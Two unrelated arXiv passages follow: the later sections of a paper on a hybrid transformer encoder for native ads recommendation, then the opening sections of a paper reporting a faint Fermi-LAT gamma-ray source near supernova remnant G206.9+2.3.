$\bullet$ \textbf{Remarks}. Compared with the expensive cross-encoding process, there are two notable characters about the proposed ua-interaction: 1) the interaction is uni-directional: with only user's hidden-states attended by the representation of ad. And 2) the interaction is introduced not from the very bottom, but at the last-layer of the transformer. Despite of its simplicity, the proposed method is desirable from the following perspectives.
First of all, it leverages the pre-computation result (i.e., the disentangled ad embeddings) and the cached hidden-states (from ua-interaction network) to establish interaction between user and ad. Therefore, it merely incurs one pass of feed-forward inference of the ua-interaction network. Besides, it's empirically found that a relatively small-scale network (compared with the user embedding network) may already be sufficient for making high-quality interaction. Therefore, it only brings about $\epsilon$ ($\epsilon\leq1$) of the transformer encoding cost as the generation of user embedding, which makes the ranking step highly competitive in time efficiency.
Secondly, the proposed ua-interaction is more effective in preserving the underlying information of user and ad. On the one hand, the ad descriptions are usually simple and compact; even without being interacted by the user, the disentangled embeddings may still comprehensively represent the advertisement. On the other hand, despite that user history can be complicated, the necessary information for measuring user-ad relationship will be fully extracted when attended by the disentangled ad embeddings. As a result, the relevance between user and ad will be measured more precisely based on such informative embeddings, which significantly benefits the identification of the best candidates.
\begin{figure}[t]
\centering
\includegraphics[width=1.0\linewidth]{Figures/train.pdf}
\caption{Illustration of the progressive training pipeline, where the blue and red dots indicate the user embedding and the ground-truth ad embedding, while the green triangles stands for the irrelevant ad embeddings. In the 1st stage, the global contrast learning discriminates the ground-truth from the global negatives, which leads to a relatively coarse-grained scope of candidates (the yellow region); in the 2nd stage, the local contrast learning identifies the ground-truth within the candidate scope, which pushes the user embedding even closer to the ground-truth ad embedding.}
\label{fig:train}
\end{figure}
\subsection{Progressive Training Pipeline}\label{sec:met-pro}
Hybrid encoder is trained progressively with two consecutive steps (as Figure \ref{fig:train}). Firstly, the \textit{global contrast learning} is carried out for the user and ad embedding networks; in this step, the model learns to discriminate the ground-truth ad from the global negatives. As a result, it makes the ground-truth to be confined within the neighbourhood of user embedding, which can be retrieved via ANN-search. Secondly, the \textit{local contrast learning} is performed for the ua-interaction network, where the model continues to learn the selection of ground-truth from the presented candidates. With this operation, the user and ad representations (more specifically, the flattened ad-related user embeddings and disentangled ad embeddings) will be further pushed together, which improves the recommendation accuracy of the ranking step.
\subsubsection{Global Contrast Learning} The global contrast learning is carried out in the form of binary classification. Firstly, a positive user-ad case $(u,a)$ is sampled from the production log; then, a total of $n$ negatives ads $\{a'_i\}_n$ are sampled from the global ad corpus $A$. As a result, the following training objective is formulated:
\begin{equation}
\begin{gathered}
\mathrm{E}_{(u,a)\sim P(u,a)} \Big( \log\big(\sigma(u,a)\big) - \sum\nolimits_{\{a'_i\}_n \sim A} \log\big(\sigma(u,a'_i)\big) \Big), \\
~ where ~ \sigma(u,a) = \text{exp}\big(Rel_{retr}(u,a)\big).
\end{gathered}
\end{equation}
With the optimization of the above objective, the user and ground-truth ad embeddings will come close towards each other; meanwhile, the global negatives' embeddings will be pushed away from the user embedding. Therefore, it enables the retrieval step to find out relevant candidate ads via ANN search.
\subsubsection{Local Contrast Learning}\label{sec:met:lcl} The local contrast learning is performed w.r.t. the well trained retrieval strategy. For each positive $(u,a)$ sample, the negative cases are sampled within the scope of candidates, i.e., the neighbour of user embedding $E_u$: $\text{N}(E_u)$, based on which the training objective is formulated as follows:
\begin{equation}
\begin{gathered}
\mathrm{E}_{(u,a)\sim P(u,a)} \Big( \log\big(\sigma(u,a)\big) - \sum\nolimits_{\{a'_i\}_n \sim \text{N}(E_u)} \log\big(\sigma(u,a'_i)\big) \Big), \\
~ where ~ \sigma(u,a) = \text{exp}\big(Rel_{rank}(u,a)\big).
\end{gathered}
\end{equation}
Notice that $\text{N}(E_u)$ does not necessarily mean the nearest neighbours of $(E_u)$. In fact, it is empirically found that the using the nearest neighbours will lead to inferior training outcome, where the underlying reasons are two-fold: firstly the nearest neighbours may give rise to a high risk of false-negatives, i.e., the sampled ads are non-clicked but relevant to user; secondly, the nearest neighbours can be monotonous, i.e., the sampled negatives are probably associated with similar semantics, thus reducing the information which can be learned form the negative samples. In our implementation, we will firstly collect a large number of neighbours of $E_u$, and then randomly sample a handful of cases as the training negatives.
\section{Experimental Studies}
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/data.pdf}
\caption{Specs about the datasets. \#Train/Valid/Test: number of samples in train/valid/test set; \#Query: number of input queries (ads: \#user, news: \#headline); \#Target: number of recommendation targets (ads: \#ad, news: \#annotation).}
\label{tab:data}
\end{table}
\begin{table*}[t]
\centering
\includegraphics[width=0.95\textwidth]{Figures/basic.pdf}
\caption{Basic Comparison \cref{sec:exp-ana-bas}, I. \& II.: results on Native Ads and Google News, respectively. The hybrid encoder outperforms the siamese encoder on both datasets, and it generates comparable performance as the cross encoder on Native Ads dataset.}
\label{tab:basic}
\end{table*}
\begin{table*}[t]
\centering
\includegraphics[width=0.95\textwidth]{Figures/time.pdf}
\caption{Hit-Time Ratio Analysis \cref{sec:exp-ana-tim} (time measured in ms). The hybrid encoder achieves comparable performance as the cross encoder, but it merely incurs small additional cost compared with the siamese encoder.}
\label{tab:time}
\end{table*}
\subsection{Experiment Settings}
The settings about the experimental studies are specified as follows.
$\bullet$ \textbf{Datasets.} The experimental studies are carried out based on production data collected from Microsoft Audience Ads platform\footnote{https://about.ads.microsoft.com/en-us/solutions/microsoft-audience-network/microsoft-audience-ads}. The dataset is composed of large-scale user-ad pairs, in which users are characterized by their web-browsing behaviors, and web-pages/advertisements are associated with their textual descriptions. As discussed in the methodology, the recommendation algorithms are required to predict user's next-clicked ad based on her web-browsing behavior. The training, validation and testing sets are strictly partitioned in time
in order to avoid data leakage: the training data is from 2020-05-01 to 2020-05-31, while the validation/testing data is from 2020-07-14 to 2020-08-11. The detailed specifications about the dataset are illustrated with Table \ref{tab:data}.
Although the proposed method is designed for native ads recommendation, it is also necessary to explore its performance on more generalized scenarios, which select semantic-close targets for the input query from a large-scale corpus. In this place, the Google News dataset\footnote{https://github.com/google-research-datasets/NewSHead} is adopted for further evaluation. This dataset contains the headlines of news articles (parsed from the provided urls) and their human annotated descriptions, e.g., news headline ``\textit{nba playoffs 2019 milwaukee bucks vs toronto raptors conference finals schedule}'' and human annotation ``\textit{NBA playoff Finals}''. In our experiment, the news headline is used as the input query, to which the related human annotation needs to be selected from the whole annotation corpus. The training and validation/testing set partition is consistent with \cite{headline2020} where the dataset was originally created.
$\bullet$ \textbf{Baselines}. As discussed, the hybrid encoder is compared with the two representative forms of transformer encoding networks \cite{luan2020sparse}. One is the \underline{siamese-encoder}, which is the conventional way of making use of transformers for native ads recommendation \cite{lu2020twinbert}; as hybrid encoder already includes a siamese component, we'll directly take that part out of the well-trained hybrid encoder for testing such that impact from inconsistent settings can be excluded. The other one is the \underline{cross-encoder}, which is the most accurate but temporally infeasible; the cross encoder is also learned through the same training workflow as the hybrid encoder's ranking component \cref{sec:met:lcl}, thus we can fairly compare the effect resulted from model architecture. The computation of user-ad relevance with both encoders is consistent with the previous introduction made in \cref{sec:met-mod-sia} and \cref{sec:met-pre}. In our experiments, we adopt \underline{BERT-base} \cite{devlin2018bert}, the 12-layer-768-dim bi-directional pretrained transformer, as our backbone structure. Besides, as BERT-base is still a too large-scale model for realtime service, another model based on a light-weighted 2-layer-128-dim \underline{distilled BERT} is trained for production usage.
$\bullet$ \textbf{Performance Evaluation}. The quality of natives ads recommendation is evaluated in terms of \underline{Hit@N}, which reflects how likely the ground-truth ad can be included within the top-N recommendation. To focus on the effect resulted from each model itself, the top-N recommendation is made based on the same two-stage workflow as discussed in \cref{sec:met-ov-two}, where a shared set of candidate ads (a total of $k$N, which equals to 100 by default) are provided from approximate nearest neighbour search. As introduced in \cref{sec:met-mod-sia}, the ANN search is performed with HNSW\footnote{https://github.com/nmslib/hnswlib}, where the embedding similarity is measured in terms of inner-product. With the shared candidate set, the siamese encoder, cross encoder and hybrid encoder will generate their recommendation results based on the ranking scores calculated with Eq.\ref{eq:siamese}, \ref{eq:cross} and \ref{eq:hybrid}, respectively.
$\bullet$ \textbf{System Settings}. All the models are implemented based on PyTorch 1.6.0 and Python 3.6.9, and trained on Nvidia V100 GPU clusters. The time cost is tested with a CPU machine (Intel(R) Xeon(R) CPU E5-2690 v4 @ 2.60GHz, with 112 GB MEM), which is consistent with the production environment\footnote{GPU inference is not feasible in production environment due to factors like huge online traffic, and the requirement of realtime service (user's request must be processed right away instead of being buffered and processed periodically)}.
\subsection{Experiment Analysis}
\subsubsection{Basic Comparison}\label{sec:exp-ana-bas} In basic comparison, a total of 100 candidate ads are firstly generated via ANN search; then each encoder makes the top-N recommendation based on its computation of user-ad relevance. The experimental results are reported in Table \ref{tab:basic}, where both datasets and both types of backbone networks are included for comparison. It can be observed that hybrid encoder outperforms siamese encoder in all settings; and while used for native ads, it achieves comparable recommendation quality as the cross encoder. In Google News dataset, gaps between hybrid encoder and cross encoder are relatively larger, which may attribute to the following reason. The Google News dataset has much less training instances than the native ads dataset; as a result, the model's performance could be limited by insufficient training. However, the cross encoder can be more robust to this adverse situation because data can be utilized with higher efficiency. Specifically, as the input query and target are jointly encoded from the bottom-up, it becomes easier to figure out their underlying relevance; therefore, it enables the model to be learned more quickly and less affected by the data sparsity. To verify the above analysis, additional experiments are carried out in which models are trained with less data on native ads dataset (with 1/3 of the original training data). It is found that the cross encoder's performance becomes ``Hit@1:0.1054, Hit@3:0.2397'', while the hybrid encoder's performance becomes ``Hit@1:0.0891, Hit@3:0.2089'' (comprehensive results are included in Table \ref{tab:partial} in Appendix). In other words, the cross encoder is less affected, which further confirms our previous analysis. More discussion about both encoders' relationship will be made in \cref{sec:exp-ana-pro}.
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/asym.pdf}
\caption{Asymmetric Model Deployment \cref{sec:exp-ana-fr}. The light-weighted ua-interaction network leads to very limited loss in recommendation quality.}
\label{tab:asym}
\end{table}
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/progress.pdf}
\caption{Progressive Training \cref{sec:exp-ana-pro}. The progressive training significantly improves hybrid encoder's performance.}
\label{tab:progress}
\end{table}
\subsubsection{Hit-Time Ratio}\label{sec:exp-ana-tim} More detailed performance analysis is made for the model trained for real-world production (i.e., the one based on distilled BERT). Particularly, the top-1 recommendation quality is measured with variant number of candidate ads from ANN search, together with the inference time needed to process every single user. (In the previous experiment, it is set to be 100 regardless of time cost; but in production, it's required strictly to work in millisecond scale). As shown in Table \ref{tab:time}, the hybrid encoder merely incurs limited additional cost compared with the siamese encoder, meanwhile it improves the recommendation quality by a large-margin. As discussed in \cref{sec:met-ov-time}, the siamese encoder takes one transformer encoding to serve each user, while the hybrid encoder merely introduces another $\epsilon$ pass of feed-forward inference ($\epsilon=1$ for this experiment as ua-interaction network and user embedding network are of the same size). While in reality, the increment of running time is even humble as the inference of user embedding network and ua-interaction network are called simultaneously. In contrast, the cross encoder is far more expensive, as user needs to be encoded from scratch with each of the candidate ads. (Although in experiment environment, the encoding process can be run in parallel given a sufficient number of machines, it's not realistic in production as online traffic is tremendous). It can be observed that the model's running time grows rapidly and soon becomes over 10 ms, which is a default threshold for many realtime services, like native ads recommendation. Despite the expensive running cost, the performance gain from cross encoder is very limited: similar to the observation in \cref{sec:exp-ana-bas}, the hybrid encoder and cross encoder's performances are quite close to each other in most of the settings.
\subsubsection{Asymmetric Model Deployment}\label{sec:exp-ana-fr} Recall that the hybrid encoder's working efficiency can be further improved if a smaller scale ua-interaction network is utilized (which makes $\epsilon$ lower than 1), we further test the model's performance with ua-interaction network and user/ad embedding network deployed asymmetrically. In particular, for user/ad embedding network with BERT-base (12-layer), the ua-interaction network is switch to a smaller 2-layer transformer; while for user/ad embedding network with distilled BERT (2-layer), the ua-interaction network is built on a single-layer transformer (the hidden-dimensions stay the same). The experiment result is demonstrated in Table \ref{tab:asym}. Despite that the ua-interaction network's scale is reduced significantly, the loss in quality is relatively small, especially when a large number of ads are recommended (Top-20). The underlying reasons are twofold. Firstly, the disentangled ad embeddings are pre-computed with the same network, whose quality remains the same. Secondly, although the ua-interaction network is simplified, user's information for analyzing user-ad relevance may still be effectively extracted thanks to its being attended by the ad.
\subsubsection{Progressive Learning}\label{sec:exp-ana-pro} The ablation study is made to evaluate the progressive training's effect on native ads recommendation \cref{sec:met-pro}. The experiment results are demonstrated in Table \ref{tab:progress}, where * means that the model is trained only with the global contrast learning. It can be observed that the hybrid encoder's performance is improved significantly when the progressive training is utilized. We further compare the progressive training pipeline's effect on cross encoder, and find that the cross encoder's performance may also benefit from it; e.g., in native ads dataset with BERT-base backbone, the performance is improved from ``Hit@1:0965, Hit@3:0.2178'' to ``Hit@1:0.1111, Hit@3:0.2497'' (more results are included in Table \ref{tab:progress-a} in Appendix). However, it is not as significant as hybrid encoder, and such a phenomenon may still be resulted from the cross-encoder's higher data efficiency in learning user-ad relevance, as discussed in \cref{sec:exp-ana-bas}. These observations do not conflict with our basic argument; in fact, the cross encoder is always more capable of making fine-grained prediction, while the hybrid encoder may get very close to the cross encoder's performance if it is trained properly and sufficiently.
\subsubsection{Degree of Disentanglement}\label{sec:exp-ana-deg} The disentanglement degree's impact on native ads recommendation is also studied (i.e., the number of disentangled ad embeddings to be generated). The experiment results are demonstrated in Table \ref{tab:degree}, where hybrid$^i$ means that the degree is set to be $i$. It can be observed that the best performance is achieved at degree 1 and 3, when the backbone structure is BERT-base (12-layer-768-dim) and distilled BERT (2-layer-128-dim), respectively. Meanwhile, further increasing the disentanglement degree will not help the model's performance. Such a phenomenon indicates that a large-scale model (e.g., BERT-base) may fully represent ad's information with one-single high-dimension vector; and when the model's scale is reduced (e.g., distilled BERT), it may require a few more vectors to fully extract ad's information. Because of the simplicity about ad's description (usually a short sequence of keywords indicating one particular product or service), a small disentanglement degree will probably be sufficient in practice.
\subsubsection{Summarization} The major findings of the experimental studies are summarized as follows.
\\
$\bullet$ The hybrid encoder significantly outperforms the siamese encoder with little additional cost; besides, it achieves comparable recommendation quality as the cross encoder, but works with much higher efficiency.
\\
$\bullet$ The progressive training pipeline contributes substantially to the model's performance. Because of the simplicity of ad description, a small disentanglement degree can be sufficient in practice. Besides, a largely simplified ua-interaction network is able to reduce the model's inference cost with very limited loss in quality.
\begin{table}[t]
\centering
\includegraphics[width=1.05\linewidth]{Figures/degree.pdf}
\caption{Degree of Disentanglement on Native Ads \cref{sec:exp-ana-deg}.}
\label{tab:degree}
\end{table}
\section{Conclusion}
In this paper, we proposed hybrid encoder for the efficient and precise native ads recommendation.
With hybrid encoders, the recommendation is made through two consecutive steps: retrieval and ranking.
In the retrieval step, user and ad are independently encoded, based on which candidate ads can be acquired via ANN search.
In the ranking step, user and ad are collaboratively encoded, where ad-related user embeddings and disentangled ad embeddings are generated to select high-quality ads from the given candidates.
Both the retrieval step and ranking step are light-weighted, which makes hybrid encoder competitive in working efficiency. Besides, a progressive training pipeline is proposed to optimize the overall performance of the two-stage workflow, where the model is learned to learned to ``make candidate retrieval from the global scope'' and ``select the best ads from the given candidates'' step-by-step. The experimental studies demonstrate that hybrid encoder significantly improves the quality of native ads recommendation compared with conventional siamese encoder; meanwhile, it achieves comparable recommendation quality as the cross encoder with highly reduced time consumption.
\bibliographystyle{Format/ACM-Reference-Format}
| 2024-02-18T23:40:19.548Z | 2021-04-23T02:16:49.000Z | algebraic_stack_train_0000 | 2,060 | 7,258 |
|
proofpile-arXiv_065-10078 | \section{Introduction} \label{sec:intro}
SNR G206.9+2.3 (also known as PKS 0646+06) is an extended radio source classified as a supernova remnant (SNR) \citep{Clark1976}. \citet{Holden1968} stated that the source was detected at 178 MHz.
Because this SNR was close to the Monoceros remnant \citep{Davies1978}, it was regarded as an extended portion of Monoceros \citep{Caswell1970}.
Subsequently, \citet{Day1972} confirmed that this was an independent object based on its 2650 MHz radio maps.
\citet{Clark1976} used a revised flux density and distance relationship to derive a distance of 2.3 (kiloparsec) kpc.
\citet{Davies1978} determined the fine filament structure of SNR G206.9+2.3 in the optical band.
\citet{Nousek1981} provided the two upper limits of X-ray emission of SNR G206.9+2.3 based on HEAO-1 observations.
In addition, they found that the X-ray intensity from the east and north portions of SNR G206.9+2.3 and Monoceros Nebula all achieved the local maximum.
\citet{Graham1982} studied the extended features of SNR G206.9+2.3 at 2700 MHz using the Efferlsberg 100-m telescope and found that its 2700 MHz spectrum feature was highly consistent with those of the observed SNRs. In addition, its contours at 2700 MHz were overlaid on the H$\rm \alpha$+[N$_{\rm \uppercase\expandafter{\romannumeral2}}$] map proposed by \citet{Davies1978}. Its distance range was estimated to be 3-5 kpc, and its shell-type morphology at 2700 MHz corresponds to the optical filamentary structure \citep{Graham1982}.
\citet{Fesen1985} presented optical spectrophotometric data of SNR G206.9+2.3
with a 1.3 m telescope at the McGraw-Hill Observatory. They found that [O$_{\rm \uppercase\expandafter{\romannumeral1}}$] and [O$_{\rm \uppercase\expandafter{\romannumeral2}}$] line strengths for discriminating SNRs from [H$_{\rm \uppercase\expandafter{\romannumeral2}}$ region; moreover, they observed two thin filaments in its southern and northeastern regions.
\citet{Leahy1986} found X-ray emissions of SNR G206.9+2.3 with Einstein. Using a Sedov model, they derived the age of the SNR to be approximately 60000 years and distance from the sun to be approximately 3-11 kpc. They estimated that this SNR was in an adiabatic blast phase based on a derived density of 0.04 cm$^{-3}$.
\citet{Odegard1986} reported that the spectrum of SNR G206.9+2.3 has a turnover between 20.6 MHz and 38 MHz; they believed that this turnover was likely to be caused by free-free absorption of cold and ionized gas.
Using the OAN-SPM 2.1 m telescope, \citet{Ambrocio-Cruz2014} studied the kinematics of SNR G206.9+2.3 in the [SII]$\lambda$ 6717 and 6731 $\rm {\AA}$ emission lines. They estimated its distance to be 2.2 kpc from the sun, the explosion energy of this SNR was 1.7 $\times$ 10$^{49}$ ergs, and its age was 6.4 $\times$ 10$^{4}$ years in the radiative phase in the radiative phase.
Generally, SNR is widely regarded as the origin of high-energy cosmic rays \citep[e.g.,][]{Aharonian2004,Ackermann2013}. Astrophysical particles from the cosmic rays of SNR can be accelerated to above 100 TeV energy bands by diffusive shock acceleration \citep[e.g.,][]{Aharonian2007,Aharonian2011}. In addition, the potential reacceleration processes within SNRs can accelerate these particles to the GeV/TeV energy band as well \citep[e.g.,][]{Caprioli2018,Cristofari2019}, which makes the energy band of SNR spectral energy distribution (SED) to
be in the range of GeV/TeV observation band \citep[e.g.,][]{Zhang2007,Morlino2012,Tang2013}.
Thus far, 24 SNRs certified and 19 SNR candidates have been included in the fourth Fermi catalog \citep{4FGL}.
Previously,
\citet{Acero2016b} did not find significant $\gamma$-ray radiation with Fermi Large Area Telescope (Fermi-LAT) for SNR G206.9+2.3.
With the accumulation of photon events, in our preliminary exploration, a likely GeV $\gamma$-ray emission in the location of SNR G206.9+2.3 was found by checking its test statistic (TS) maps, which strongly encouraged us to further investigate its GeV features and likely origin of the SNR G206.9+2.3 region. This is of great significance in exploring the unknown origin of cosmic rays and the acceleration limit of particles within the SNR in the future.
The remainder of this paper is divided as follows: the data reduction is introduced in Section 2; the process of source detection is presented in Section 3; the likely origins of SNR G206.9+2.3 and its GeV features are discussed and summarized in Section 4.
\section{Data Preparation} \label{sec:data-reduction}
A binned likelihood tutorial\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/binned{\_}likelihood{\_}tutorial.html} was used in this analysis.
Fermitool of version {\tt v11r5p3}\footnote{http://fermi.gsfc.nasa.gov/ssc/data/analysis/software/} was utilized in all subsequent analyses.
The photon events class with evclass = 128 and evtype = 3 and the instrumental response function (IRF) of ``P8R3{\_}SOURCE{\_}V3'' were selected to analyze the region of interest (ROI) of $20^{\circ}\times 20^{\circ}$, which was centered at the location of (R.A., decl.= 102.17$^{\circ}$, 6.43$^{\circ}$; from SIMBAD\footnote{from http://simbad.u-strasbg.fr/simbad/}).
An energy range of 0.8-500 GeV was selected to maintain a small point spread function (PSF) and decrease the contribution from the galactic and extragalactic diffuse backgrounds.
The observation period ranged from August 4, 2008 (mission elapsed time (MET) 239557427) to December 29, 2020 (MET 630970757). The maximum zenith angle of $90^{\circ}$ was selected to reduce the contribution from the Earth Limb.
The script {\tt make4FGLxml.py}\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/user/} and the latest fourth Fermi catalog \citep[4FGL;][]{4FGL}, gll{\_}psc{\_}v27.fit\footnote{https://fermi.gsfc.nasa.gov/ssc/data/access/lat/10yr{\_}catalog/}, were used to generate a source model file, which included all sources within 30$^{\circ}$ around the SIMBAD location of SNR G206.9+2.3.
A point source with a power-law spectrum\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/xml{\_}model{\_}defs.html\#powerlaw} was subsequently added to the SIMBAD position of SNR G206.9+2.3 in the source model file to analyze its $\gamma$-ray features. We selected free spectral indexes and normalizations for all sources within the 5$^{\circ}$ range around the SIMBAD position of SNR G206.9+2.3. In addition,
normalizations of two background models, including the isotropic extragalactic ({\tt iso{\_}P8R3{\_}SOURCE{\_}V3{\_}v1.txt}) and the galactic diffuse ({\tt iso{\_}P8R3{\_}SOURCE{\_}V3{\_}v1.txt})\footnote{http://fermi.gsfc.nasa.gov/ssc/data/access/lat/BackgroundModels.html.} diffuse backgrounds, were freed as well.
\subsection{\rm Source Detection} \label{sec:data-reduction}
A complete TS map, including the $\gamma$-ray excess from the background of the SNR G206.9+2.3 region, was first generated using {\tt gttsmap}. As shown in panel (a) of Figure \ref{Fig1}, the SIMBAD location of SNR G206.9+2.3 showed significant $\gamma$-ray radiation with a TS value of 12.27.
To reduce the contribution from the surrounding $\gamma$-ray excess, we added a point source with a power-law spectrum to the location of P1 (R.A., decl.=101.02$^{\circ}$, 5.99$^{\circ}$) to exclude the $\gamma$-ray excess of the local maxima in the TS map for all subsequent analyses. Significant $\gamma$-ray radiation still existed and was more significant than in other locations in the 2.6$^{\circ}$ $\times$2.6$^{\circ}$ region, as shown in panel (b) of Figure \ref{Fig1}.
Further, we excluded the emission of the SIMBAD position of SNR G206.9+2.3 to examine the probable $\gamma$-ray residual radiation near the location of SNR G206.9+2.3. However, we did not find any probable sources, as shown in panel (c) of Figure \ref{Fig1}. Its $\gamma$-ray radiation still existed and was significant with TS value of 10.87.
Furthermore, we calculated the best-fit position of the $\gamma$-ray radiation (R.A., decl. = 102.24$^{\circ}$, 6.52$^{\circ}$) with a 1$\sigma$ error circle of 0.14$^{\circ}$ using {\tt gtfindsrc}; we found that its SIMBAD position is within the 1$\sigma$ error circle of its best-fit location. Moreover, radio contours of SNR G206.9+2.3 from the Effelsberg 100-m telescope \citep{Reich1997} overlapped with the region within 2$\sigma$ error circle. Therefore, we suggest the discovered $\gamma$-ray source is likely to be a counterpart of SNR G206.9+2.3, as shown in Figure \ref{Fig2}.
Subsequently, the $\gamma$-ray spatial distribution of SNR G206.9+2.3 in the 0.8-500 GeV band was tested using the uniform disk and two-dimensional (2D) Gaussian models\footnote{https://fermi.gsfc.nasa.gov/ssc/data/analysis/scitools/xml{\_}model{\_}defs.html\#MapCubeFunction}.
Here, we used different radii and $\sigma$, ranging from 0.05$^{\circ}$ to 1$^{\circ}$, with a step of 0.05$^{\circ}$, to test results from these models. Calculating the values of TS$_{\rm ext}$, which is defined as 2log($L_{\rm ext}$/$L_{\rm ps}$), where $L_{\rm ps}$ and $L_{\rm ext}$ are the maximum likelihood values from a point source and an extended source, respectively.
The maximum values of TS$_{\rm ext}$ from the uniform disk and 2D Gaussian models were close to 4 and 3, respectively.
Here, we present the best-fit results with the largest TS values from the two spatial models in Table \ref{table1}.
These results suggest a certain degree of performance for the spatial distribution of GeV $\gamma$-ray emission from the SNR G206.9+2.3 region.
Therefore, we chose the uniform disk model as the best-fit spatial model of the signal observed for subsequently spectral and timing analyses\footnote{Since the real spatial distribution of gamma rays is unknown for the SNR, and this object is relatively weak at present, we believe that such substitution is valuable for this study \citep[e.g.,][]{Feng2019}.}.
To check the significance of this signal, we subsequently tested three other TS maps above 0.7 GeV, with an increment of 0.1 GeV. We found that the $\gamma$-ray residual radiation of SNR G206.9+2.3 is still more significant than other locations within the $2.6^{\circ}\times 2.6^{\circ}$ region, as shown in Figure \ref{Fig3}.
Here, we present the correlative best-fit results of SNR G206.9+2.3 from the other three different energy bands with three kinds of spatial models in Table \ref{table2}. We found that their TS values were $>$9. Therefore, we proved that a new GeV source exists in the region.
Although this source was weaker than most sources in 4FGL thus far, we cannot deny the authenticity of this GeV signal. For most weak GeV sources with TS$<$25, Fermi-LAT data point with TS value$>$4 can be regarded as credible data points currently \citep[e.g.,][]{Xing2016,Xi2020b,Xiang2021a}. Based on SNR evolution, the age of SNR G206.9+2.3 is approximately 6.4 $\times$10$^{4}$ years \citep{Ambrocio-Cruz2014}, and it may be at a late evolution stage \citep{Guo2017}.
If SNR G206.9+2.3 enters the radiation cooling phase, as the velocity of the shock wave slows down continuously, the temperature of the material after the shock wave will rapidly cool, and the high-energy particles inside SNR will lose most energies through radiation. Meanwhile, it may be in a weak state above 1 GeV \citep{Cox1972,Blondin1998,Brantseg2013}.
For an old SNR G206.9+2.3, we thought that a low photon flux and TS value was likely at present; thus, we suggested that the new GeV source is likely to be a counterpart of SNR G206.9+2.3.
\begin{table}[!h]
\begin{center}
\caption{The best-fit results for SNR G206.9+2.3 from different spatial models in 0.8-500 GeV band}
\begin{tabular}{lcccccccc}
\hline\noalign{\smallskip}
Spatial Model & Radius ($\sigma$) & Spectral Index & Photon Flux & -log(Likelihood) & TS$_{\rm ext}$ \\
& degree & & $\rm 10^{-10} ph$ $\rm cm^{-2} s^{-1}$ & & & \\
\hline\noalign{\smallskip}
Point source & ... & 3.35$\pm$0.56 & 3.66$\pm$1.21 & 256046.27 & - \\
2D Gaussian & 0.15$^{\circ}$ & 2.84$\pm$0.41 & 3.08$\pm$0.87 & 256044.60 & 3.34 \\
uniform disk & 0.25$^{\circ}$ & 2.81$\pm$0.39 & 4.48$\pm$1.30 & 256044.36 & 3.83 \\
\noalign{\smallskip}\hline
\end{tabular}
\label{table1}
\end{center}
\end{table}
\begin{table}[!h]
\scriptsize
\begin{center}
\caption[]{The best-fit parameters of SNR G206.9+2.3 for three different energy ranges}
\begin{tabular}{lclclclclclclc}
\hline\noalign{\smallskip}
\hline\noalign{\smallskip}
Different Energy Range & photon flux & Spectral Model & $\Gamma$ & TS value \\
& $10^{-10}$ ph cm$^{-2}$s$^{-1}$ & & & \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{point source model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $3.74\pm1.41$ & PowerLaw & $2.96\pm0.42$ & 9.01 \\
900 MeV - 500 GeV & $2.97\pm1.02$ & PowerLaw & $3.49\pm0.71 $ & 10.00 \\
1000 MeV - 500 GeV & $2.60\pm0.88$ & PowerLaw & $3.74\pm0.80$ & 10.32 \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{uniform disk model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $5.00\pm1.52$ & PowerLaw & $2.67\pm0.31$ & 14.29 \\
900 MeV - 500 GeV & $3.61\pm1.11$ & PowerLaw & $2.74\pm0.38 $ & 13.71 \\
1000 MeV - 500 GeV & $3.19\pm0.98$ & PowerLaw & $2.90\pm0.46$ & 13.13 \\
\hline\noalign{\smallskip}
\multicolumn{5}{c}{2D Gaussian model} \\
\hline\noalign{\smallskip}
700 MeV - 500 GeV & $5.20\pm 1.58$ & PowerLaw & $2.69\pm0.33$ & 13.94 \\
900 MeV - 500 GeV & $3.74\pm1.14$ & PowerLaw & $ 2.77\pm0.40$ & 13.21 \\
1000 MeV - 500 GeV & $3.30\pm1.00$ & PowerLaw & $2.94\pm0.50$ & 12.67 \\
\hline\noalign{\smallskip}
\end{tabular}
\label{table2}
\end{center}
\end{table}
\begin{figure*}[!h]
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=70mm]{fig1.pdf}
\centerline{(\emph{a})}
\end{minipage}%
\begin{minipage}[t]{0.495\textwidth}
\centering
\includegraphics[width=70mm]{fig2.pdf}
\centerline{(\emph{b})}
\end{minipage}%
\vfill
\begin{minipage}[t]{1\linewidth}
\centering
\includegraphics[width=70mm]{fig3.pdf}
\centerline{(\emph{c})}
\end{minipage}%
\caption{
Size of the three TS maps is $2.6^{\circ} \times2.6^{\circ}$ with 0.04$^{\circ}$ pixel in the 0.8-500 GeV band. A Gaussian function with a kernel of $\sigma =0.3^{\circ}$ was used to smoothen them. The SIMBAD location of SNR G206.9+2.3 is marked as a cyan cross. The 68\% and 95\% best-fit position uncertainties of SNR G206.9+2.3 are marked using solid and dashed green circles in each TS map, respectively.}
\label{Fig1}
\end{figure*}
\begin{figure}[!h]
\centering
\includegraphics[width=\textwidth, angle=0,width=110mm,height=100mm]{fig4.pdf} %
\caption{Size of the TS map is $1.6^{\circ} \times 1.6^{\circ}$ with $0.04^{\circ}$ pixel in the 0.8-500 GeV energy band. Green contours are from the radio observation of the Effelsberg 100-m telescope \citep{Reich1997}.
For other general descriptions, please refer to Figure \ref{Fig1}.
}
\label{Fig2}
\end{figure}
\begin{figure*}[!h]
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=66mm]{tsmap700.pdf}
\centerline{(\emph{a})}
\end{minipage}%
\begin{minipage}[t]{0.495\linewidth}
\centering
\includegraphics[width=70mm]{tsmap900.pdf}
\centerline{(\emph{b})}
\end{minipage}%
\begin{minipage}[t]{1\linewidth}
\centering
\includegraphics[width=70mm]{tsmap1000.pdf}
\centerline{(\emph{c})}
\end{minipage}%
\caption{Three TS maps in different energy bands.
For other general descriptions, please refer to Figure \ref{Fig1}.
}
\label{Fig3}
\end{figure*}
\subsection{Spectral Energy Distribution}
In this analysis, we generated the spectral energy distribution (SED) with four equally logarithmic energy bins for SNR G206.9+2.3 in the 0.2-500 GeV bands.
